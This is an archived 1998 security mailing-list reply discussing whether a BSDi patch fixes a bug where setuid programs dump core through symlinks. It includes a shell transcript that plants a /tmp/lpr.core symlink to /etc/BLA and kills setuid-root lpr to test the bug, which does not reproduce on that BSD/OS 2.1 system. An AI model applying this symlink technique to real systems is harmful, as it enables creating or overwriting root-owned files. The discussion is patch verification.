On Tue, 31 Mar 1998, Denis Papp wrote: > I have a system running BSD/OS 2.1 with all the patches from BSDi, including > K210-029 which I quote: > "This patch addresses a security problem with core dumps from setuid programs." > That's very wierd. Back when I found the same bug in BSDI 3.0 I tried the same in BSDi 2.1 and it didn't work. Maybe we used a different patch, but this is the transcript: jupiter[ /tmp ] uname -a BSD/OS jupiter.cs.huji.ac.il 2.1 BSDI BSD/OS 2.1 Kernel #4: Tue Oct 8 08:49:52 IST 1996 dannyat_private:/sys/compile/CHAMSA i386 jupiter[ /tmp ] ls -la lpr.core lrwxrwxrwt 1 root wheel 8 Apr 2 11:37 lpr.core@ -> /etc/BLA jupiter[ /tmp ] lpr & [1] 29989 jupiter[ /tmp ] [1] + Suspended (tty input) lpr jupiter[ /tmp ] kill -6 %1 jupiter[ /tmp ] fg lpr IOT trap jupiter[ /tmp ] ls -la /etc/BLA ls: /etc/BLA: No such file or directory jupiter[ /tmp ] jupiter[ /tmp ] ls -la `which lpr` -rwsr-sr-x 1 root daemon 26533 Feb 19 1996 /usr/local/bin/lpr* jupiter[ /tmp ] lpr will dump core if there is no symlink there. Maybe you failed to install the patch correctly? Regards, Nir. -- Nir Soffer * scorpiosat_private * http://www.cs.huji.ac.il/~scorpios "I wouldn't recommend sex drugs or insanity for everyone but they've always worked for me." -- Hunter S. Thompson Mail me with the subject 'get pgp key' for my PGP Public key.
This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 13:47:53 PDT